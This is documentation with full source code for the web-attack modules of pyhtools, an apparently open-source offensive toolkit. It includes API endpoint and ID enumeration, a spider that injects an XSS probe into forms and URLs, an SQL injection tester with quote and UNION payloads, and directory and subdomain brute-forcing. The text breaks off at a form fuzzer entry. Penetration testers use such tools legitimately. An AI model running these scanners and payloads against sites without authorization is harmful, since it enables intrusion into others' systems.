Web Attackers Documentation

API

APIdiscover

Class to discover API endpoints

Source code in pyhtools\attackers\web\api\discover.py
class APIdiscover:
    '''
    Class to discover API endpoints
    '''
    def __init__(self, base_url: str, match_codes: list[int], rate_limit: int = 20, delay: float = 0.05, output_file_path: str = None, headers: dict = None) -> None:
        '''APIdiscover constructor

        Args:
            base_url (str): web URL of the API
            match_codes (list): list of integers containing HTTP response status codes which indicate that the endpoint exists
            rate_limit (int): number of concurrent requests at the same time
            delay (float): delay between consecutive requests
            output_file_path (str): file path to store results in json format
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        assert isinstance(base_url, str)
        assert isinstance(match_codes, list)
        assert isinstance(rate_limit, int)
        assert isinstance(delay, float)

        self.base_url = base_url
        self.output_file_path = output_file_path
        self.match_codes = match_codes
        self._delay = delay
        self._semaphore = asyncio.Semaphore(rate_limit)
        self._headers = headers

    async def check_endpoint(self, endpoint: str) -> dict:
        '''checks whether the endpoint is valid using an HTTP GET request and
        returns a dict containing endpoint information

        Args: 
            endpoint(str): api endpoint

        Returns: 
            dict: contains HTTP request and response data
        '''
        assert isinstance(endpoint, str)

        url = urljoin(self.base_url, endpoint)
        async with self._semaphore:
            async with ClientSession(headers=self._headers) as session:
                async with session.get(url) as response:
                    if response.status in self.match_codes:
                        logger.info(f'{endpoint}\t{response.status}')

                    logger.debug(f'{url}\t{response.status}')

                    await asyncio.sleep(self._delay)
                    return {
                        "endpoint": endpoint,
                        "status": response.status,
                        "req_url": str(response.request_info.real_url),
                        "req_method": response.request_info.method,
                        "req_headers": dict(**response.request_info.headers),
                        "res_redirection": str(response.history),
                        "res_headers": dict(response.headers),
                        "res_body": (await response.read()).decode('utf-8'),
                    }

    async def get_endpoints_from_file(self, wordlist_path: str):
        '''reads endpoints from wordlist file and returns as a list

        Args:
            wordlist_path (str): path of wordlist file

        Returns:
            list: list of str containing endpoints
        '''
        assert isinstance(wordlist_path, str) and isfile(wordlist_path)

        endpoints = None
        with open(wordlist_path, 'r') as f:
            endpoints = [str(endpoint).strip() for endpoint in f.readlines()]

        return endpoints

    async def save_result_to_file(self, results: list[dict], file_path: str,):
        '''stores json result to file

        Args:
            file_path (str): path to output file
            results (list): list of HTTP response (dict) 

        Returns:
            bool: returns True if file was saved else False in case 
            of any exception
        '''
        assert isinstance(results, list)
        assert isinstance(file_path, str)

        save_status = False
        with open(file_path, 'w') as f:
            try:
                f.write(to_json(results))
                save_status = True
                logger.info(f'results stored in {file_path}')
            except JSONDecodeError:
                logger.error(
                    f'Invalid json data, Failed to store data in {file_path}')

        return save_status

    async def start_enum_from_file(self, wordlist_file: str):
        '''
        start endpoint enumeration using wordlist

        Args:
            wordlist_file(str): path of wordlist file

        Returns:
            None
        '''
        endpoints = await self.get_endpoints_from_file(wordlist_file)

        results = await self.enumerate(endpoints=endpoints)

        if self.output_file_path:
            await self.save_result_to_file(
                results=results,
                file_path=self.output_file_path,
            )

    async def start_enum_id(self, ending_id: int, param_name: str, starting_id: int = 0):
        '''starts enumeration based on id in GET request

        Args:
            ending_id (int): object id after which enumeration should stop
            param_name (str): GET param
            starting_id (int): object id from which enumeration should start

        Returns:
            None
        '''
        assert isinstance(starting_id, int)
        assert isinstance(ending_id, int)
        assert isinstance(param_name, str)

        endpoints = [f'{self.base_url}{param_name}={id_val}' for id_val in range(starting_id, ending_id)]

        results = await self.enumerate(endpoints=endpoints)

        if self.output_file_path:
            await self.save_result_to_file(
                results=results,
                file_path=self.output_file_path,
            )

    async def enumerate(self, endpoints: list):
        '''start API enumeration and return captured responses as list

        Args:
            endpoints (list): contains list of endpoints as str

        Returns:
            results (list): list of results containing dict of 
            endpoint information
        '''
        assert isinstance(endpoints, list)

        tasks = []
        for endpoint in endpoints:
            tasks.append(
                asyncio.ensure_future(
                    self.check_endpoint(endpoint=endpoint)
                )
            )

        results = await asyncio.gather(*tasks)
        return results
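
A minimal usage sketch (the base URL, wordlist and output paths are hypothetical, and the import path is assumed to mirror the source file location):

import asyncio
from pyhtools.attackers.web.api.discover import APIdiscover

async def main():
    discoverer = APIdiscover(
        base_url='http://localhost:8000/',      # hypothetical target API
        match_codes=[200, 301, 403],            # status codes treated as "endpoint exists"
        rate_limit=10,
        delay=0.1,
        output_file_path='api_results.json',    # results are written here as JSON
    )
    await discoverer.start_enum_from_file('wordlists/api_endpoints.txt')

asyncio.run(main())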

__init__(base_url, match_codes, rate_limit=20, delay=0.05, output_file_path=None, headers=None)

APIdiscover constructor

Parameters:

Name Type Description Default
base_url str

web URL of the API

required
match_codes list

list of integers containing HTTP response status codes which indicate that the endpoint exists

required
rate_limit int

number of concurrent requests at the same time

20
delay float

delay between consecutive requests

0.05
output_file_path str

file path to store results in json format

None
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\api\discover.py
def __init__(self, base_url: str, match_codes: list[int], rate_limit: int = 20, delay: float = 0.05, output_file_path: str = None, headers: dict = None) -> None:
    '''APIdiscover constructor

    Args:
        base_url (str): web URL of the API
        match_codes (list): list of integers containing HTTP response status codes which indicate that the endpoint exists
        rate_limit (int): number of concurrent requests at the same time
        delay (float): delay between consecutive requests
        output_file_path (str): file path to store results in json format
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    assert isinstance(base_url, str)
    assert isinstance(match_codes, list)
    assert isinstance(rate_limit, int)
    assert isinstance(delay, float)

    self.base_url = base_url
    self.output_file_path = output_file_path
    self.match_codes = match_codes
    self._delay = delay
    self._semaphore = asyncio.Semaphore(rate_limit)
    self._headers = headers

check_endpoint(endpoint) async

checks whether the endpoint is valid using an HTTP GET request and returns a dict containing endpoint information

Parameters:

Name Type Description Default
endpoint(str)

api endpoint

required

Returns:

Name Type Description
dict dict

contains HTTP request and response data

Source code in pyhtools\attackers\web\api\discover.py
async def check_endpoint(self, endpoint: str) -> dict:
    '''checks whether the endpoint is valid using an HTTP GET request and
    returns a dict containing endpoint information

    Args: 
        endpoint(str): api endpoint

    Returns: 
        dict: contains HTTP request and response data
    '''
    assert isinstance(endpoint, str)

    url = urljoin(self.base_url, endpoint)
    async with self._semaphore:
        async with ClientSession(headers=self._headers) as session:
            async with session.get(url) as response:
                if response.status in self.match_codes:
                    logger.info(f'{endpoint}\t{response.status}')

                logger.debug(f'{url}\t{response.status}')

                await asyncio.sleep(self._delay)
                return {
                    "endpoint": endpoint,
                    "status": response.status,
                    "req_url": str(response.request_info.real_url),
                    "req_method": response.request_info.method,
                    "req_headers": dict(**response.request_info.headers),
                    "res_redirection": str(response.history),
                    "res_headers": dict(response.headers),
                    "res_body": (await response.read()).decode('utf-8'),
                }

enumerate(endpoints) async

start API enumeration and return captured responses as list

Parameters:

Name Type Description Default
endpoints list

contains list of endpoints as str

required

Returns:

Name Type Description
results list

list of results containing dict of

endpoint information

Source code in pyhtools\attackers\web\api\discover.py
async def enumerate(self, endpoints: list):
    '''start API enumeration and return captured responses as list

    Args:
        endpoints (list): contains list of endpoints as str

    Returns:
        results (list): list of results containing dict of 
        endpoint information
    '''
    assert isinstance(endpoints, list)

    tasks = []
    for endpoint in endpoints:
        tasks.append(
            asyncio.ensure_future(
                self.check_endpoint(endpoint=endpoint)
            )
        )

    results = await asyncio.gather(*tasks)
    return results

get_endpoints_from_file(wordlist_path) async

reads endpoints from wordlist file and returns as a list

Parameters:

Name Type Description Default
wordlist_path str

path of wordlist file

required

Returns:

Name Type Description
list

list of str containing endpoints

Source code in pyhtools\attackers\web\api\discover.py
async def get_endpoints_from_file(self, wordlist_path: str):
    '''reads endpoints from wordlist file and returns as a list

    Args:
        wordlist_path (str): path of wordlist file

    Returns:
        list: list of str containing endpoints
    '''
    assert isinstance(wordlist_path, str) and isfile(wordlist_path)

    endpoints = None
    with open(wordlist_path, 'r') as f:
        endpoints = [str(endpoint).strip() for endpoint in f.readlines()]

    return endpoints

save_result_to_file(results, file_path) async

stores json result to file

Parameters:

Name Type Description Default
file_path str

path to output file

required
results list

list of HTTP response (dict)

required

Returns:

Name Type Description
bool

returns True if file was saved else False in case

of any exception

Source code in pyhtools\attackers\web\api\discover.py
async def save_result_to_file(self, results: list[dict], file_path: str,):
    '''stores json result to file

    Args:
        file_path (str): path to output file
        results (list): list of HTTP response (dict) 

    Returns:
        bool: returns True if file was saved else False in case 
        of any exception
    '''
    assert isinstance(results, list)
    assert isinstance(file_path, str)

    save_status = False
    with open(file_path, 'w') as f:
        try:
            f.write(to_json(results))
            save_status = True
            logger.info(f'results stored in {file_path}')
        except JSONDecodeError:
            logger.error(
                f'Invalid json data, Failed to store data in {file_path}')

    return save_status

start_enum_from_file(wordlist_file) async

start endpoint enumeration using wordlist

Parameters:

Name Type Description Default
wordlist_file(str)

path of wordlist file

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\api\discover.py
async def start_enum_from_file(self, wordlist_file: str):
    '''
    start endpoint enumeration using wordlist

    Args:
        wordlist_file(str): path of wordlist file

    Returns:
        None
    '''
    endpoints = await self.get_endpoints_from_file(wordlist_file)

    results = await self.enumerate(endpoints=endpoints)

    if self.output_file_path:
        await self.save_result_to_file(
            results=results,
            file_path=self.output_file_path,
        )

start_enum_id(ending_id, param_name, starting_id=0) async

starts enumeration based on id in GET request

Parameters:

Name Type Description Default
ending_id int

object id after which enumeration should stop

required
param_name str

GET param

required
starting_id int

object id from which enumeration should start

0

Returns:

Type Description

None

Source code in pyhtools\attackers\web\api\discover.py
async def start_enum_id(self, ending_id: int, param_name: str, starting_id: int = 0):
    '''starts enumeration based on id in GET request

    Args:
        ending_id (int): object id after which enumeration should stop
        param_name (str): GET param
        starting_id (int): object id from which enumeration should start

    Returns:
        None
    '''
    assert isinstance(starting_id, int)
    assert isinstance(ending_id, int)
    assert isinstance(param_name, str)

    endpoints = [f'{self.base_url}{param_name}={id_val}' for id_val in range(starting_id, ending_id)]

    results = await self.enumerate(endpoints=endpoints)

    if self.output_file_path:
        await self.save_result_to_file(
            results=results,
            file_path=self.output_file_path,
        )
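
Note that start_enum_id concatenates param_name=<id> directly onto base_url, so the base URL should already end with the query separator. A short sketch against a hypothetical target:

import asyncio
from pyhtools.attackers.web.api.discover import APIdiscover

# sends GET requests for http://localhost:8000/api/users?id=0 ... ?id=99 (hypothetical target)
discoverer = APIdiscover(base_url='http://localhost:8000/api/users?', match_codes=[200])
asyncio.run(discoverer.start_enum_id(ending_id=100, param_name='id', starting_id=0))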

Vuln Scanner

Scanner

Scans for vulnerabilities in the website

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
class Scanner:
    '''Scans for vulnerabilities in the website'''
    def __init__(self, url:str, ignore_links:list) -> None:

        self.target_url = url

        if ignore_links:
            self.ignore_links = ignore_links
        else:
            self.ignore_links = []

        self.session = requests.Session()
        self.target_links = []


    def get_links(self, url:str)->list:
        '''extracts links from the whole webpage.
        Args:
            url (str): URL of the webpage

        Returns: 
            links (list): list of URLs present in the webpage
        '''
        response = self.session.get(url)
        content = str(response.content)
        return re.findall(r'(?:href=")(.*?)"',content)


    def get_target_links(self, url:str):
        '''extracts and prints useful links that are
        related only to the target webpage.

        Args:
            url (str): URL of the target webpage

        Returns:
            list: useful links as str related to target webpage
        '''
        links = self.get_links(url)
        for link in links:
            link = urljoin(url, link)

            if '#' in link:
                link = link.split('#')[0]

            if link not in self.target_links and self.target_url in link and link not in self.ignore_links:
                self.target_links.append(link)
                if requests.get(link).status_code==200:
                    print(link)
                self.get_target_links(link)


    def remove_escape_seq(self, content:str)->str:
        r'''removes \r \t \n from the html parsed content if present.

        Args: 
            content (str): html page content as string

        Returns: 
            str: escaped html content without \r \t \n chars
        '''
        return content.replace(r'\n','').replace(r'\t','').replace(r'\r','').replace(r"\'","'")


    def get_page_content(self, url:str)->str:
        '''extracts html code of the webpage

        Args:
            url (str): URL of the webpage

        Returns:
            str: Html content as string
        '''
        response = self.session.get(url)
        content = str(response.content)
        content = self.remove_escape_seq(content)
        return content


    def get_forms(self, url:str)->list:
        '''extracts all the forms on the url 
        webpage using beautiful soup 4

        Args:
            url (str): URL of webpage

        Returns: 
            list: list of forms (bs4.element.ResultSet)
        ''' 
        page_content = self.get_page_content(url)
        page_content = self.remove_escape_seq(page_content)
        page_html = BeautifulSoup(page_content,'html.parser')
        return page_html.find_all(name='form')


    def submit_form(self, form, value, url):
        '''submits form with passed value to url passed

        Args: 
            form (dict): webpage form from bs4.element.ResultSet
            value (str): Form input value to be used while filling form
            url (str): base url of webpage

        Returns: 
            str: html contents of the response
        '''
        action = form.get('action')
        post_url = urljoin(url, action)
        # print(post_url)

        method = form.get('method')
        post_data_dict = {}

        inputs = form.find_all('input')
        for input in inputs:
            inp_name = input.get('name') 
            inp_type = input.get('type')
            inp_value = input.get('value')

            if inp_type == 'text':
                inp_value = value

            post_data_dict[inp_name]=inp_value

        if method == 'post':
            post_response = self.session.post(url=post_url, data=post_data_dict)
        else:
            post_response = self.session.get(url=url, params=post_data_dict)

        return self.remove_escape_seq(str(post_response.content))


    def is_xss_vulnerable_in_form(self, form, url)->bool:
        '''tests whether the passed form is xss vulnerable or not. 

        Args:
            form (dict): webpage form from bs4.element.ResultSet
            url (str): base url of webpage

        Returns: 
            bool: returns True if vulnerable else False
        '''
        test_script_payload = "<scRipt>alert('vulnerable')</sCript>"
        response_content = self.submit_form(form, test_script_payload, url)
        # response = BeautifulSoup(response_content, 'html.parser')
        # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())
        return test_script_payload in response_content


    def is_xss_vulnerable_in_link(self, url, payload=None):
        '''tests whether the passed url is xss vulnerable or not. 

        Args:
            url (str): base url of webpage
            payload (str): XSS payload to be injected in URL during test

        Returns: 
            bool: returns True if vulnerable else False
        '''
        if payload is None:
            payload = "<scRipt>alert('vulnerable')</sCript>"
        url = url.replace('=',f'={payload}')
        response_content = self.get_page_content(url)
        # response = BeautifulSoup(response_content, 'html.parser')
        # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())

        return payload in response_content


    def run(self):
        '''Starts the scanner

        Args:
            None

        Returns: 
            None
        '''
        try:
            try:
                print(BRIGHT_WHITE + '[*] Spider is mapping website.')
                print(BRIGHT_YELLOW + '[!] Press ctrl+c to stop mapping!')
                self.get_target_links(self.target_url)
            except KeyboardInterrupt:
                print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! Stopping Spider. Website mapping stopped.')

            print(BRIGHT_WHITE + '[*] Finding vulnerabilities on the mapped webpages.')
            forms = self.get_forms(self.target_url)

            for link in self.target_links:
                forms = self.get_forms(link)
                for form in forms:
                    print(BRIGHT_WHITE + '[*] Scanning/Testing vuln in form of link: ', link)
                    if self.is_xss_vulnerable_in_form(form,link):
                        print(BRIGHT_YELLOW + f'[!] Found XSS vuln in {link} form : ')
                        print(form)
                        print()

                if "=" in link:
                    print(BRIGHT_WHITE + '[*] Scanning/Testing vuln from URL of link: ', link)
                    if self.is_xss_vulnerable_in_link(link):
                        print(BRIGHT_YELLOW + '[!] Found XSS vuln in URL :', link)
                        print()
        except Exception as e:
            print(BRIGHT_RED + f'[-] Exception : {e}')
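
A minimal usage sketch (the target and ignored link are hypothetical, and the import path is assumed to mirror the source file location):

from pyhtools.attackers.web.vuln_scanner.scanner import Scanner

scanner = Scanner(
    url='http://testphp.vulnweb.com/',                        # hypothetical target root URL
    ignore_links=['http://testphp.vulnweb.com/logout.php'],   # pages to skip while spidering
)
# maps the site, then tests discovered forms and parameterized URLs for reflected XSS
scanner.run()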

get_forms(url)

extracts all the forms on the url webpage using beautiful soup 4

Parameters:

Name Type Description Default
url str

URL of webpage

required

Returns:

Name Type Description
list list

list of forms (bs4.element.ResultSet)

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_forms(self, url:str)->list:
    '''extracts all the forms on the url 
    webpage using beautiful soup 4

    Args:
        url (str): URL of webpage

    Returns: 
        list: list of forms (bs4.element.ResultSet)
    ''' 
    page_content = self.get_page_content(url)
    page_content = self.remove_escape_seq(page_content)
    page_html = BeautifulSoup(page_content,'html.parser')
    return page_html.find_all(name='form')

get_links(url)

extracts links from the whole webpage.

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
links list

list of URLs present in the webpage

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_links(self, url:str)->list:
    '''extracts links from the whole webpage.
    Args:
        url (str): URL of the webpage

    Returns: 
        links (list): list of URLs present in the webpage
    '''
    response = self.session.get(url)
    content = str(response.content)
    return re.findall(r'(?:href=")(.*?)"',content)

get_page_content(url)

extracts html code of the webpage

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
str str

Html content as string

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_page_content(self, url:str)->str:
    '''extracts html code of the webpage

    Args:
        url (str): URL of the webpage

    Returns:
        str: Html content as string
    '''
    response = self.session.get(url)
    content = str(response.content)
    content = self.remove_escape_seq(content)
    return content

get_target_links(url)

extracts and prints useful links that are related only to the target webpage.

Parameters:

Name Type Description Default
url str

URL of the target webpage

required

Returns:

Name Type Description
list

useful links as str related to target webpage

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def get_target_links(self, url:str):
    '''extracts and prints useful links that are
    related only to the target webpage.

    Args:
        url (str): URL of the target webpage

    Returns:
        list: useful links as str related to target webpage
    '''
    links = self.get_links(url)
    for link in links:
        link = urljoin(url, link)

        if '#' in link:
            link = link.split('#')[0]

        if link not in self.target_links and self.target_url in link and link not in self.ignore_links:
            self.target_links.append(link)
            if requests.get(link).status_code==200:
                print(link)
            self.get_target_links(link)

is_xss_vulnerable_in_form(form, url)

tests whether the passed form is xss vulnerable or not.

Parameters:

Name Type Description Default
form dict

webpage form from bs4.element.ResultSet

required
url str

base url of webpage

required

Returns:

Name Type Description
bool bool

returns True if vulnerable else False

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def is_xss_vulnerable_in_form(self, form, url)->bool:
    '''tests whether the passed form is xss vulnerable or not. 

    Args:
        form (dict): webpage form from bs4.element.ResultSet
        url (str): base url of webpage

    Returns: 
        bool: returns True if vulnerable else False
    '''
    test_script_payload = "<scRipt>alert('vulnerable')</sCript>"
    response_content = self.submit_form(form, test_script_payload, url)
    # response = BeautifulSoup(response_content, 'html.parser')
    # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())
    return test_script_payload in response_content

is_xss_vulnerable_in_link(url, payload=None)

tests whether the passed url is xss vulnerable or not.

Parameters:

Name Type Description Default
url str

base url of webpage

required
payload str

XSS payload to be injected in URL during test

None

Returns:

Name Type Description
bool

returns True if vulnerable else False

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def is_xss_vulnerable_in_link(self, url, payload=None):
    '''tests whether the passed url is xss vulnerable or not. 

    Args:
        url (str): base url of webpage
        payload (str): XSS payload to be injected in URL during test

    Returns: 
        bool: returns True if vulnerable else False
    '''
    if payload is None:
        payload = "<scRipt>alert('vulnerable')</sCript>"
    url = url.replace('=',f'={payload}')
    response_content = self.get_page_content(url)
    # response = BeautifulSoup(response_content, 'html.parser')
    # print(BRIGHT_YELLOW + '[-] RESPONSE: \n', response.prettify())

    return payload in response_content

remove_escape_seq(content)

removes \r \t \n from the html parsed content if present.

Parameters:

Name Type Description Default
content str

html page content as string

required

Returns:

Name Type Description
str str

escaped html content without \r \t \n chars

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def remove_escape_seq(self, content:str)->str:
    r'''removes \r \t \n from the html parsed content if present.

    Args: 
        content (str): html page content as string

    Returns: 
        str: escaped html content without \r \t \n chars
    '''
    return content.replace(r'\n','').replace(r'\t','').replace(r'\r','').replace(r"\'","'")

run()

Starts the scanner

Returns:

Type Description

None

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def run(self):
    '''Starts the scanner

    Args:
        None

    Returns: 
        None
    '''
    try:
        try:
            print(BRIGHT_WHITE + '[*] Spider is mapping website.')
            print(BRIGHT_YELLOW + '[!] Press ctrl+c to stop mapping!')
            self.get_target_links(self.target_url)
        except KeyboardInterrupt:
            print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! Stopping Spider. Website mapping stopped.')

        print(BRIGHT_WHITE + '[*] Finding vulnerabilities on the mapped webpages.')
        forms = self.get_forms(self.target_url)

        for link in self.target_links:
            forms = self.get_forms(link)
            for form in forms:
                print(BRIGHT_WHITE + '[*] Scanning/Testing vuln in form of link: ', link)
                if self.is_xss_vulnerable_in_form(form,link):
                    print(BRIGHT_YELLOW + f'[!] Found XSS vuln in {link} form : ')
                    print(form)
                    print()

            if "=" in link:
                print(BRIGHT_WHITE + '[*] Scanning/Testing vuln from URL of link: ', link)
                if self.is_xss_vulnerable_in_link(link):
                    print(BRIGHT_YELLOW + '[!] Found XSS vuln in URL :', link)
                    print()
    except Exception as e:
        print(BRIGHT_RED + f'[-] Exception : {e}')

submit_form(form, value, url)

submits form with passed value to url passed

Parameters:

Name Type Description Default
form dict

webpage form from bs4.element.ResultSet

required
value str

Form input value to be used while filling form

required
url str

base url of webpage

required

Returns:

Name Type Description
str

html contents of the response

Source code in pyhtools\attackers\web\vuln_scanner\scanner.py
def submit_form(self, form, value, url):
    '''submits form with passed value to url passed

    Args: 
        form (dict): webpage form from bs4.element.ResultSet
        value (str): Form input value to be used while filling form
        url (str): base url of webpage

    Returns: 
        str: html contents of the response
    '''
    action = form.get('action')
    post_url = urljoin(url, action)
    # print(post_url)

    method = form.get('method')
    post_data_dict = {}

    inputs = form.find_all('input')
    for input in inputs:
        inp_name = input.get('name') 
        inp_type = input.get('type')
        inp_value = input.get('value')

        if inp_type == 'text':
            inp_value = value

        post_data_dict[inp_name]=inp_value

    if method == 'post':
        post_response = self.session.post(url=post_url, data=post_data_dict)
    else:
        post_response = self.session.get(url=url, params=post_data_dict)

    return self.remove_escape_seq(str(post_response.content))

Module: sqli.py
Author: dmdhrumilmistry
Project: github.com/dmdhrumilmistry/pyhtools
License: MIT

enumerate_tests(url)

tests application for various SQL injection methods

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Type Description

None

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def enumerate_tests(url):
    '''tests application for various SQL injection methods

    Args: 
        url (str): url of the target

    Returns: 
        None
    '''
    vuln_links = 0
    sqli_payloads = ["'", "'--",
                     "' UNION SELECT NULL--", "' UNION ORDER BY 1--"]

    for payload in sqli_payloads:
        payload_url = url + payload

        if is_vulnerable(payload_url):
            print(f'[URL] "{payload_url}"')
            print(f'[PAYLOAD] {payload}')
            print('-'*40)
            vuln_links += 1

    print(f'[VULN] {vuln_links} total vulnerable links found')

is_url_valid(url)

checks if url is valid

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Name Type Description
bool bool

returns True if url is valid else False

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def is_url_valid(url: str) -> bool:
    '''checks if url is valid

    Args: 
        url (str): url of the target

    Returns:
        bool: returns True if url is valid else False
    '''
    is_valid = False
    if 'http://' in url or 'https://' in url:
        is_valid = True

    if len(url.split('?')[-1]) == 0:
        is_valid = False

    return is_valid

is_vulnerable(url)

tests whether the app is vulnerable at the given url

Parameters:

Name Type Description Default
url str

url of the target

required

Returns:

Name Type Description
bool bool

returns True if vulnerable else returns False

Source code in pyhtools\attackers\web\vuln_scanner\sqli.py
def is_vulnerable(url: str) -> bool:
    '''tests whether the app is vulnerable at the given url

    Args: 
        url (str): url of the target

    Returns: 
        bool: returns True if vulnerable else returns False
    '''
    response = get(url=url)
    content = response.content.lower()

    if response.status_code not in (200, 404) or b'error' in content or b'on line' in content or b'at line' in content:
        return True

    return False
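
A short usage sketch tying the helpers together (hypothetical target URL; is_url_valid expects a scheme and a query string, and the import path is assumed to mirror the source file location):

from pyhtools.attackers.web.vuln_scanner.sqli import enumerate_tests, is_url_valid

target = 'http://testphp.vulnweb.com/artists.php?artist=1'   # hypothetical target URL

if is_url_valid(target):
    enumerate_tests(target)   # appends each payload to the URL and reports matches
else:
    print('[!] URL must include a scheme and a query string, e.g. http://host/page?param=value')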

get_args()

get arguments from the user and return as dict containing target_url, ignore_links, login_link, and login_details

Returns:

Name Type Description
dict

user arguments

Source code in pyhtools\attackers\web\vuln_scanner\__main__.py
def get_args():
    '''get arguments from the user and return as dict containing
    target_url, ignore_links, login_link, and login_details

    Args:
        None

    Returns:
        dict: user arguments
    '''
    parser = argparse.ArgumentParser(description='Web Application Vulnerability Scanner')
    parser.add_argument('-t', '--target-url',dest='target_url',help='root url of the target website', required=True)
    parser.add_argument('-ig', '--ignore-links', dest='ignore_links', help='urls of webpages which are to be ignored while scanning/testing for vulnerabilities separated by commas')
    parser.add_argument('-l','--login-link',dest='login_link',help='direct login/authentication link')
    parser.add_argument('-ld', '--login-details', dest='login_details', help='pass login details if authentication required as username,password (separated by comma)')
    args = parser.parse_args()


    if args.target_url:
        target_url = args.target_url

    login_link = None
    if args.login_link:
        login_link = args.login_link

    login_details = None
    if args.login_details is not None:
        login_details = [detail.strip() for detail in args.login_details.split(',')]

    ignore_links = None
    if args.ignore_links is not None:
        ignore_links = [link.strip() for link in args.ignore_links.split(',')]

    return {
        "target_url": target_url,
        "ignore_links": ignore_links,
        "login_link": login_link,
        "login_details" : login_details,
    }
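
A sketch of how the returned dict can be wired into the Scanner (hypothetical glue code inside the __main__ module; the actual flow, including login handling via login_link and login_details, is not shown here):

from pyhtools.attackers.web.vuln_scanner.scanner import Scanner

# get_args() reads -t/--target-url, -ig/--ignore-links, -l/--login-link and -ld/--login-details
args = get_args()

scanner = Scanner(url=args['target_url'], ignore_links=args['ignore_links'])
scanner.run()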

Enumerate

Discoverer

Discoverer can be used to enumerate directories and subdomains of target website.

Source code in pyhtools\attackers\web\enumerate.py
class Discoverer:
    '''
    Discoverer can be used to enumerate directories and subdomains of target website.
    '''

    def __init__(self, *args, **kwargs) -> None:
        self._requester = AsyncRLRequests(*args, **kwargs)

    async def _filter_request(self, url: str, status_codes: list[int] = [200, 403, 500]):
        '''prints url if response status code matches a code from status_codes.

        Args:
            url (str): URL of website   
            status_codes (list): list of integer containing HTTP response  
            status codes, which detects that directory/subdomain exists

        Returns:
            None
        '''
        response = await self._requester.request(url=url)

        if isinstance(response, dict) and response.get('status') in status_codes:
            print(url, response.get('status'))

    async def check_dirs(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
        '''enumerate website directories

        Args:
            domain (str): domain of the target
            wordlist_path (str): path of wordlist file
            status_codes (list): list of integer containing HTTP response  
            status codes, which detects that directory exists

        Returns:
            None
        '''
        if not domain.endswith('/'):
            domain += '/'
        if not domain.startswith(('http://', 'https://')):
            domain = f'http://{domain}'

        dirs = read_file_lines(wordlist_path)

        tasks = []
        for dir in dirs:
            link = urljoin(domain, dir)
            tasks.append(
                ensure_future(
                    self._filter_request(link, status_codes)
                )
            )

        await gather(*tasks)

    async def check_subdomains(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
        '''enumerate website subdomains

        Args:
            domain (str): domain of the target
            wordlist_path (str): path of wordlist file
            status_codes (list): list of integer containing HTTP response  
            status codes, which indicate that the subdomain exists

        Returns:
            None
        '''
        domain = domain.replace('https://', '').replace('http://', '')
        subdomains = read_file_lines(wordlist_path)

        tasks = []
        for subdomain in subdomains:
            url = f'http://{subdomain}.{domain}'
            tasks.append(
                ensure_future(
                    self._filter_request(url, status_codes)
                )
            )

        await gather(*tasks)
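
A minimal usage sketch (hypothetical domain and wordlist paths; constructor arguments are forwarded to AsyncRLRequests):

import asyncio
from pyhtools.attackers.web.enumerate import Discoverer

async def main():
    discoverer = Discoverer(rate_limit=20, delay=0.05)
    # hypothetical wordlists; matching directories/subdomains are printed with their status code
    await discoverer.check_dirs('example.com', 'wordlists/dirs.txt')
    await discoverer.check_subdomains('example.com', 'wordlists/subdomains.txt')

asyncio.run(main())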

check_dirs(domain, wordlist_path, status_codes=[200, 403, 500]) async

enumerate website directories

Parameters:

Name Type Description Default
domain str

domain of the target

required
wordlist_path str

path of wordlist file

required
status_codes list

list of integer containing HTTP response

[200, 403, 500]

Returns:

Type Description

None

Source code in pyhtools\attackers\web\enumerate.py
async def check_dirs(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
    '''enumerate website directories

    Args:
        domain (str): domain of the target
        wordlist_path (str): path of wordlist file
        status_codes (list): list of integer containing HTTP response  
        status codes, which detects that directory exists

    Returns:
        None
    '''
    if not domain.endswith('/'):
        domain += '/'
    if not domain.startswith(('http://', 'https://')):
        domain = f'http://{domain}'

    dirs = read_file_lines(wordlist_path)

    tasks = []
    for dir in dirs:
        link = urljoin(domain, dir)
        tasks.append(
            ensure_future(
                self._filter_request(link, status_codes)
            )
        )

    await gather(*tasks)

check_subdomains(domain, wordlist_path, status_codes=[200, 403, 500]) async

enumerate website subdomains

Parameters:

Name Type Description Default
domain str

domain of the target

required
wordlist_path str

path of wordlist file

required
status_codes list

list of integer containing HTTP response

[200, 403, 500]

Returns:

Type Description

None

Source code in pyhtools\attackers\web\enumerate.py
async def check_subdomains(self, domain: str, wordlist_path: str, status_codes: list[int] = [200, 403, 500]):
    '''enumerate website subdomains

    Args:
        domain (str): domain of the target
        wordlist_path (str): path of wordlist file
        status_codes (list): list of integer containing HTTP response  
        status codes, which indicate that the subdomain exists

    Returns:
        None
    '''
    domain = domain.replace('https://', '').replace('http://', '')
    subdomains = read_file_lines(wordlist_path)

    tasks = []
    for subdomain in subdomains:
        url = f'http://{subdomain}.{domain}'
        tasks.append(
            ensure_future(
                self._filter_request(url, status_codes)
            )
        )

    await gather(*tasks)

Get Forms

fuzz_forms(target_url)

get forms from html page, send post request and return html response

Parameters:

Name Type Description Default
target_url str

webpage URL containing forms

required

Returns:

